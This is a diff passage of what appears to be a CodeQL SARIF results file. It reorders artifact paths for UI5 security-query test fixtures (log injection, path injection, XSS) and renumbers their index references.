@@ -41173,19 +14987,19 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 174 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 175 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 176 } 
@@ -41197,49 +15011,49 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 178 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 179 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 180 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 181 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 182 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 183 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 184 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 185 } 
@@ -41251,55 +15065,55 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", "uriBaseId" : "%SRCROOT%", "index" : 187 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 188 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 189 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 190 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 191 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 192 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 193 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 194 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", "uriBaseId" : "%SRCROOT%", "index" : 195 } 
@@ -41323,37 +15137,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 199 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 200 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", "uriBaseId" : "%SRCROOT%", "index" : 201 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 202 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 203 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", "index" : 204 } 
@@ -41377,31 +15191,31 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 208 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 209 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 210 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 211 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 212 } 
@@ -41413,19 +15227,19 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 214 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 215 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 216 } @@ -41443,13 +15257,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 219 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 220 } 
@@ -41461,43 +15275,43 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 222 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 223 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 224 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 225 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 226 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 227 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 228 } @@ -41527,37 +15341,37 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 233 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 234 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 235 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 236 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", "uriBaseId" : "%SRCROOT%", "index" : 237 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 238 } 
@@ -42253,55 +16067,55 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 354 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 355 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", "index" : 356 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 357 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 358 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 359 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", "index" : 360 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", "uriBaseId" : "%SRCROOT%", "index" : 361 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", "index" : 362 } @@ -42313,13 +16127,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 364 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 365 } @@ -42415,7 +16229,7 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 381 } @@ -42445,13 +16259,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", "uriBaseId" : "%SRCROOT%", "index" : 386 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 387 } 
@@ -42487,13 +16301,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 393 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", "uriBaseId" : "%SRCROOT%", "index" : 394 } @@ -42511,13 +16325,13 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", "index" : 397 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 398 } 
@@ -42541,91 +16355,91 @@ } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 402 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 403 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 404 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", "uriBaseId" : "%SRCROOT%", "index" : 405 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", "index" : 406 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", "uriBaseId" : "%SRCROOT%", "index" : 407 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", "uriBaseId" : "%SRCROOT%", "index" : 408 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 409 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 410 } }, { "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 411 } }, { "location" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uri" : "javascript/heuristic-models/tests/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 412 } }, { "location" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uri" : "qlt.conf.json", "uriBaseId" : "%SRCROOT%", "index" : 413 } }, { "location" : { - "uri" : "qlt.conf.json", + "uri" : "scripts/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 414 } }, { "location" : { - "uri" : "scripts/codeql-pack.lock.yml", + "uri" : "scripts/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 415 } }, { "location" : { - "uri" : "scripts/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 416 } @@ -45265,7 +19079,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 361 + "index" : 362 }, "region" : { "startLine" : 8, @@ -45323,7 +19137,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", "uriBaseId" : "%SRCROOT%", - "index" : 360 + "index" : 361 }, "region" : { "startLine" : 5, 
@@ -45341,7 +19155,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 361 + "index" : 362 }, "region" : { "startLine" : 8, @@ -45392,7 +19206,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 387 + "index" : 386 }, "region" : { "startLine" : 8, @@ -45413,7 +19227,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 393 + "index" : 398 }, "region" : { "startLine" : 5, @@ -45468,7 +19282,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 387 + "index" : 386 }, "region" : { "startLine" : 8, @@ -45489,7 +19303,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 393 + "index" : 398 }, "region" : { "startLine" : 5, @@ -45519,7 +19333,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 398 + "index" : 397 }, "region" : { "startLine" : 8, @@ -45540,7 +19354,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 403 + "index" : 402 }, "region" : { "startLine" : 5, @@ -45595,7 +19409,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", "uriBaseId" : "%SRCROOT%", - "index" : 398 + "index" : 397 }, "region" : { "startLine" : 8, 
@@ -45616,7 +19430,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 403 + "index" : 402 }, "region" : { "startLine" : 5, @@ -45860,7 +19674,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 8, @@ -45881,7 +19695,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 5, @@ -45900,7 +19714,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 163 + "index" : 166 }, "region" : { "startLine" : 10, @@ -45918,7 +19732,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 8, @@ -45939,7 +19753,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 5, @@ -46751,7 +20565,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 356 }, "region" : { "startLine" : 8, 
@@ -46772,7 +20586,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 356 }, "region" : { "startLine" : 5, @@ -46808,7 +20622,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 356 }, "region" : { "startLine" : 8, @@ -46829,7 +20643,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", "uriBaseId" : "%SRCROOT%", - "index" : 355 + "index" : 356 }, "region" : { "startLine" : 5, @@ -46858,7 +20672,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 22, @@ -46879,7 +20693,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 8, @@ -46898,7 +20712,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 407 + "index" : 406 }, "region" : { "startLine" : 9, @@ -46916,7 +20730,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 22, @@ -46938,7 +20752,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : 